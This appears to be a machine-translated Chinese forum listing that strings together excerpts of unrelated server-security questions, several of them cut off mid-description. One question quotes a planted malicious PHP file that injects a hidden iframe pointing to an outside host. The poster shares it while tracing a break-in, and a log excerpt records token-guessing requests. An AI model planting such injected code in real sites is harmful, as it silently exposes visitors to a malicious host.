这是一个非常基本的问题,但也是一个我似乎无法真正找到答案的问题,尽管查看了 nmap 文档(man、online 和 google)。
我的问题是,例如,执行nmap <target>和之间有什么区别nmap -sS <target>?我知道这-sS是 TCP SYN 扫描,但我想我不确定的是这与仅使用nmap <target>?
为了详细说明这一点,我想知道使用以下配置托管在 IIS 网站上的文档的安全性:
我相信这是一个相对安全的设置(我理解它不像真正经过身份验证的访问那么安全。)我想知道我是否看到了这堵大墙,但它很容易被比我更了解的人绕过。
我想我正在寻找的是一种可以绕过我上面概述的设置的方法。
我正在阅读有关Hiawatha 的文章,我想知道是否真的可以认为 Freebsd+Hiawatha 比 Linux+Lighttpd 或任何其他网络服务器更安全。
此外,如果您必须托管一个非常敏感的网站,您会使用哪个软件平台?
我有一个朋友托管了一些数据,可以使用两种方法从服务器下载:
但是,对于数据有两个重要的考虑因素:它非常敏感,因为他不希望任何“中间人”能够告诉谁获得了数据或数据来自何处(来自服务器/ISP 日志等。 .) 当世界各地的访问者带宽极其有限时,它也应该可以访问。数据应该可以公开访问,并且易于被知道其存在的人获取。
这里的最终目标是保护访问者,让中间人无法知道访问者请求了什么内容,或者他/她从哪里请求它。基本上,正如标题所说,我们想要一个无法追踪的网络服务器。
为了帮助从中间人的日志中隐藏网站的身份,并帮助保护请求数据的个人,我认为一种解决方案是构建几个地理上分散的代理服务器,这些代理服务器与诸如No-IP.com。我认为以某种方式加密从 A 点到 B 点的数据(超越简单 SSL 的东西)也很好。
撇开编码考虑不谈,我想知道你们将如何在项目的服务器和网络端实现这种类型的安全性。
我使用像 no-ip.com 这样的服务,在全球范围内有许多不同的代理服务器的想法有意义吗?
PS:我意识到这篇文章中的一些内容含糊不清。不幸的是,我无法具体说明数据是什么,或者我们为什么需要这样一个安全的基础设施——与我们需要它的原因完全相同。如果您有任何疑虑或问题,请随时直接与我联系。
好的,所以我 ssh 很多,主要是从我的 Mac 到我的 Linux 机器,但有时也从 Linux 机器到 mac 或从 Mac 到 Mac。我想实现一种安全的无密码方式在这些计算机之间进行 ssh,这样我就不必每天输入 50 次 ssh 密码。我知道可以通过创建一组没有密码短语的 SSH 密钥来完成,但我知道这不是一种安全或可靠的方法。
在服务器上,我使用 Perl 脚本,该脚本计划使用 FTP 从另一台服务器定期下载一些文件。不幸的是,Perl FTP 模块中存在一些问题,导致脚本不时失败并意外终止。我发现这个问题可以通过从被动模式切换到主动模式来轻松解决。
如果我正确理解了这两种 FTP 模式之间的区别,那么使用主动模式将意味着我需要在防火墙内打开某个端口范围。我认为这会带来一些安全风险。所以我的问题是是否有一些解决方法或好的做法,以便我可以在我的服务器上以不会导致任何额外风险的方式使用活动模式。
我在网络服务器上托管了一堆 PHP 网站。虽然我已采取所有预防措施来保护所有端口,但特定于端口 80 的攻击仍在继续。我想禁止任何对任何网页产生积极兴趣的 IP 地址,例如在一小时内超过 200 个,或在一分钟内超过 15 个。我假设人类用户不能在一分钟内浏览 15 个页面,除非他有确实值得怀疑的原因。
理想情况下,我希望将 IP 地址登录到被禁止的数据库中,并且对于属于我的客户的那些 IP 地址也有一个白名单 IP 地址。
是否有任何现成的工具可以完成所有这些工作。我看到了fail2ban,它没有达到目的......
我最近继承了一台运行 ColdFusion 8 的服务器,并且相信它可能已经有一段时间没有针对安全更新进行修补(根据http://www.adobe.com/support/security/#coldfusion)。
Coldfusion 安装是 8.0.1 (8,0,1,195765),但是我没有看到任何其他信息来查看从 Adobe 安全页面上显示的 13 中安装了哪些补丁。
有没有办法告诉我安装了哪些补丁?如果没有,我能告诉我们 8.0.1 中包含了哪些,所以我不必包含这些吗?
此外,看起来有些更新包含其他较旧的更新 - 我可以只安装最新的更新(列出来修复 APSB11-14)还是我还需要其他一些更新?
我有一台运行 Debian Lenny 的服务器。最近我遇到了一些安全问题。我特别看到在 /etc/php5/conf.d 中创建了一个名为“php-dev.ini”的文件。乍一看,该文件看起来正常且无害,直到您打开它。它包含:
<?php print "<iframe src='http://google-traf.zyns.com/index.php?tp=4abd7c0637c89d7a' width='1' height='1' frameborder='0'></iframe>"; ?>
Run Code Online (Sandbox Code Playgroud)
显然我知道服务器有安全问题,所以请不要说“你给服务器打补丁了吗?” 回应。那已经完成了。已检查服务器是否存在 rootkit,并且没有可疑帐户。我对什么用户或 PID 正在写入此目录特别感兴趣,并且正在寻找可以使用哪些工具来帮助我。我已经研究过“iwatch”和“inotify”,但想在我走上研究之路之前从其他人那里得到一些反馈。有谁知道一个可以帮助我识别的好工具:
基本上,我希望做一些取证并了解监视文件系统。任何见解将不胜感激。
(编辑以引用 PHP 代码示例,因为它之前未显示。)
66.65.71.240 - - [05/Aug/2011:21:56:09 -0700] "GET /api/account_verify?accesstoken=k198nrtc7flswo6qhimuv5pd0 HTTP/1.1" 500 2334 "-" "Geolo 1.0 rv:18 (iPhone; iPhone OS 4.3; en_US)" "at:-" "dt:-" secure
220.128.111.225 - - [05/Aug/2011:21:56:11 -0700] "GET /api/account_verify?accesstoken=dv8asg0lwh2m1iu95bo3y6cjt HTTP/1.1" 500 2334 "-" "Geolo 1.0 rv:18 (iPhone; iPhone OS 4.3.3; en_SG)" "at:-" "dt:-" secure
124.171.7.154 - - [05/Aug/2011:21:56:13 -0700] "GET /api/account_verify?accesstoken=apu4q0sxtejni76z58ykwdrgl HTTP/1.1" 500 2334 "-" "Geolo 1.0 rv:18 (iPhone; iPhone OS 4.3.4; en_AU)" "at:-" "dt:-" secure
216.220.110.238 - - [05/Aug/2011:21:56:13 -0700] "GET /api/account_verify?accesstoken=9m6aqr4h2x0sp7fblw1ycveo5 HTTP/1.1" 500 2334 "-" "Geolo 1.0 rv:18 …Run Code Online (Sandbox Code Playgroud) security ×10
linux ×5
hacking ×2
web-server ×2
apache-2.2 ×1
blocking ×1
coldfusion ×1
ddos ×1
debian ×1
firewall ×1
freebsd ×1
ftp ×1
iis ×1
ip-blocking ×1
mac-osx ×1
networking ×1
port-80 ×1
ssh ×1
ubuntu ×1
unix ×1
windows ×1